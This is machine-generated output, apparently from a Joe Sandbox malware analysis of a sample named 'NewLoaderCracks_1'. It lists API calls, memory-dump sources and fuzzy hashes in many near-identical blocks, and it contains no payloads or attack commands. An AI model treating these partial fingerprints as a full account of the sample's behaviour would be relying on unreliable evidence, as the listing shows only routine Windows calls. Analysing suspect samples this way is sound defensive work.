                • Instruction ID: 0d6143e7f417021c4a95c407a404bd6469f188c47d2b722bb0d6c69ff4c9db1f
                • Opcode Fuzzy Hash: b5f323252862f6179fd514a4c5fab59f4983ea174bc7aa729f78b24d9e905cc4
                • Instruction Fuzzy Hash: 05A002A716D103BD31287151BD6AE3B0A6CE4C4B52330891BB80A944495555584D5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DAB2
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 057e92bd4c07af5b8a2ec8c58cef74d66fcd47e64a3800ca21a0d8ec55e368f8
                • Instruction ID: 0d6143e7f417021c4a95c407a404bd6469f188c47d2b722bb0d6c69ff4c9db1f
                • Opcode Fuzzy Hash: 057e92bd4c07af5b8a2ec8c58cef74d66fcd47e64a3800ca21a0d8ec55e368f8
                • Instruction Fuzzy Hash: 05A002A716D103BD31287151BD6AE3B0A6CE4C4B52330891BB80A944495555584D5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DAB2
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: b8b1193273a56765c66e2ea34c81e33efea6b86618db49cb2e4411c9c8c2b47b
                • Instruction ID: 0d6143e7f417021c4a95c407a404bd6469f188c47d2b722bb0d6c69ff4c9db1f
                • Opcode Fuzzy Hash: b8b1193273a56765c66e2ea34c81e33efea6b86618db49cb2e4411c9c8c2b47b
                • Instruction Fuzzy Hash: 05A002A716D103BD31287151BD6AE3B0A6CE4C4B52330891BB80A944495555584D5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DAB2
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: adae12d5946af0c9866f81e798c8686d5a968783e0f985a3b442f5826de66e7f
                • Instruction ID: 0d6143e7f417021c4a95c407a404bd6469f188c47d2b722bb0d6c69ff4c9db1f
                • Opcode Fuzzy Hash: adae12d5946af0c9866f81e798c8686d5a968783e0f985a3b442f5826de66e7f
                • Instruction Fuzzy Hash: 05A002A716D103BD31287151BD6AE3B0A6CE4C4B52330891BB80A944495555584D5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DAB2
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: c1eba118a1b6c46a287c3894995dc56c8e76098fe719015e041354c981fcb6d5
                • Instruction ID: 0d6143e7f417021c4a95c407a404bd6469f188c47d2b722bb0d6c69ff4c9db1f
                • Opcode Fuzzy Hash: c1eba118a1b6c46a287c3894995dc56c8e76098fe719015e041354c981fcb6d5
                • Instruction Fuzzy Hash: 05A002A716D103BD31287151BD6AE3B0A6CE4C4B52330891BB80A944495555584D5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DAB2
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 7acb9a6226490440966b3214caa561ab4305cd65dc5417bf059463c4912f460f
                • Instruction ID: bddb6bc2d9e43e08a4b64d9f0411eb9928632849c9d15a2a3f93df2dcb97bae0
                • Opcode Fuzzy Hash: 7acb9a6226490440966b3214caa561ab4305cd65dc5417bf059463c4912f460f
                • Instruction Fuzzy Hash: E2A002A726D5027D3168B151FD6AE3B0A6CF4D0B53330851BB80A944495555584D5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DBD5
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: ab024aa130c34835737e8463d5f80acb79a6db85e1e992e797913b562bd63886
                • Instruction ID: 8ba09817d90f6dad19597ef9d179c29d6d4e0860af4df8f29ed62a3cff4950f8
                • Opcode Fuzzy Hash: ab024aa130c34835737e8463d5f80acb79a6db85e1e992e797913b562bd63886
                • Instruction Fuzzy Hash: D4A0029726D107BD311851517D6BD760B3DF4C4B62331891BBD0A9415159505C4D5931
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DC36
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: d21940626543b716994b49dc27ead0d907b8106df8af1df91a44888008a2a089
                • Instruction ID: 23cf5c8ea9618947f8a69eee677ad4918288f0c541f791f754cd487d0640f3d8
                • Opcode Fuzzy Hash: d21940626543b716994b49dc27ead0d907b8106df8af1df91a44888008a2a089
                • Instruction Fuzzy Hash: DCA0129716C103BC301C21403C26D360A3CE4C0B523308C0BBC0A9004095801C0C5430
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DC36
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 6482de8d92a46e2f2fc3296973fe0e0ce79b7930f1a29713581215243e5afa16
                • Instruction ID: 23cf5c8ea9618947f8a69eee677ad4918288f0c541f791f754cd487d0640f3d8
                • Opcode Fuzzy Hash: 6482de8d92a46e2f2fc3296973fe0e0ce79b7930f1a29713581215243e5afa16
                • Instruction Fuzzy Hash: DCA0129716C103BC301C21403C26D360A3CE4C0B523308C0BBC0A9004095801C0C5430
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DBD5
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: eba6340bf3ecbe53a1809fc6a59a7d4ed5bfb0ab72087797edf0c0b041cc8878
                • Instruction ID: 8ba09817d90f6dad19597ef9d179c29d6d4e0860af4df8f29ed62a3cff4950f8
                • Opcode Fuzzy Hash: eba6340bf3ecbe53a1809fc6a59a7d4ed5bfb0ab72087797edf0c0b041cc8878
                • Instruction Fuzzy Hash: D4A0029726D107BD311851517D6BD760B3DF4C4B62331891BBD0A9415159505C4D5931
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DBD5
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: ced1fc45f33ab895362bf9444da94c191f1b8ab9d03f2485f18feb33d26e4c32
                • Instruction ID: 8ba09817d90f6dad19597ef9d179c29d6d4e0860af4df8f29ed62a3cff4950f8
                • Opcode Fuzzy Hash: ced1fc45f33ab895362bf9444da94c191f1b8ab9d03f2485f18feb33d26e4c32
                • Instruction Fuzzy Hash: D4A0029726D107BD311851517D6BD760B3DF4C4B62331891BBD0A9415159505C4D5931
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DBD5
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 197071ea1e2988bdaae533a680561730d0ac0607ed92b754a2f5d1136a2c8de2
                • Instruction ID: 8ba09817d90f6dad19597ef9d179c29d6d4e0860af4df8f29ed62a3cff4950f8
                • Opcode Fuzzy Hash: 197071ea1e2988bdaae533a680561730d0ac0607ed92b754a2f5d1136a2c8de2
                • Instruction Fuzzy Hash: D4A0029726D107BD311851517D6BD760B3DF4C4B62331891BBD0A9415159505C4D5931
                APIs
                • SetEndOfFile.KERNELBASE(?,00549104,?,?,-00001964), ref: 00549EC2
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: File
                • String ID:
                • API String ID: 749574446-0
                • Opcode ID: d268456f94185afbf394bdc835c1bdfaeff4b21926531e8d6360f926cb90e6da
                • Instruction ID: cc3f84ea991543c8d7fc2f4db266fb47dab8a7dd55fd6e66d5b3e245d63db810
                • Opcode Fuzzy Hash: d268456f94185afbf394bdc835c1bdfaeff4b21926531e8d6360f926cb90e6da
                • Instruction Fuzzy Hash: 90B011300A000A8ACF002B30EC088283A20FA2230A30082A0A00ACA0A0EB22C00ABA00
                APIs
                • SetCurrentDirectoryW.KERNELBASE(?,0055A587,C:\Users\user\Desktop,00000000,0058946A,00000006), ref: 0055A326
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: CurrentDirectory
                • String ID:
                • API String ID: 1611563598-0
                • Opcode ID: f1503658fdfd97ca41c1e22a65b2b525b322af4797cd6e0323a5e31b9b62a752
                • Instruction ID: 0112741930cea298a9c1be0512525d4c7067704389339c5dd1bbfa7489390e35
                • Opcode Fuzzy Hash: f1503658fdfd97ca41c1e22a65b2b525b322af4797cd6e0323a5e31b9b62a752
                • Instruction Fuzzy Hash: 45A01230194006568B000B30DC09C1577505770702F0086207006C00A0CB308858F500
                APIs
                • CloseHandle.KERNELBASE(000000FF,?,?,0054968F,?,?,?,?,00571FA1,000000FF), ref: 005496EB
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: CloseHandle
                • String ID:
                • API String ID: 2962429428-0
                • Opcode ID: 09698ff151d47ab4153cd89f10b19992699fa418b0bb76cbf4dd9de790c292cf
                • Instruction ID: 67ef5d7cf6239105b28b7fe1c3402c6f18ae4f749ea37ed2a1901756e4174457
                • Opcode Fuzzy Hash: 09698ff151d47ab4153cd89f10b19992699fa418b0bb76cbf4dd9de790c292cf
                • Instruction Fuzzy Hash: 98F05E30556B058FDB308A24D58A7D3BBE8BB12739F049B1E90EB435E89761688D9B01
                APIs
                  • Part of subcall function 0054130B: GetDlgItem.USER32(00000000,00003021), ref: 0054134F
                  • Part of subcall function 0054130B: SetWindowTextW.USER32(00000000,005735B4), ref: 00541365
                • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0055B971
                • EndDialog.USER32(?,00000006), ref: 0055B984
                • GetDlgItem.USER32(?,0000006C), ref: 0055B9A0
                • SetFocus.USER32(00000000), ref: 0055B9A7
                • SetDlgItemTextW.USER32(?,00000065,?), ref: 0055B9E1
                • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0055BA18
                • FindFirstFileW.KERNEL32(?,?), ref: 0055BA2E
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0055BA4C
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0055BA5C
                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0055BA78
                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0055BA94
                • _swprintf.LIBCMT ref: 0055BAC4
                  • Part of subcall function 0054400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0054401D
                • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0055BAD7
                • FindClose.KERNEL32(00000000), ref: 0055BADE
                • _swprintf.LIBCMT ref: 0055BB37
                • SetDlgItemTextW.USER32(?,00000068,?), ref: 0055BB4A
                • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0055BB67
                • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0055BB87
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0055BB97
                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0055BBB1
                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0055BBC9
                • _swprintf.LIBCMT ref: 0055BBF5
                • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0055BC08
                • _swprintf.LIBCMT ref: 0055BC5C
                • SetDlgItemTextW.USER32(?,00000069,?), ref: 0055BC6F
                  • Part of subcall function 0055A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0055A662
                  • Part of subcall function 0055A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0057E600,?,?), ref: 0055A6B1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                • API String ID: 797121971-1840816070
                • Opcode ID: a22a5dc5db410cec8f4623a971e580d196065e4125458513dd866447ea4f619a
                • Instruction ID: eefe0744fe20905401ea62d6d10ea87ff2c5890195bf42d829c60c3dfc957547
                • Opcode Fuzzy Hash: a22a5dc5db410cec8f4623a971e580d196065e4125458513dd866447ea4f619a
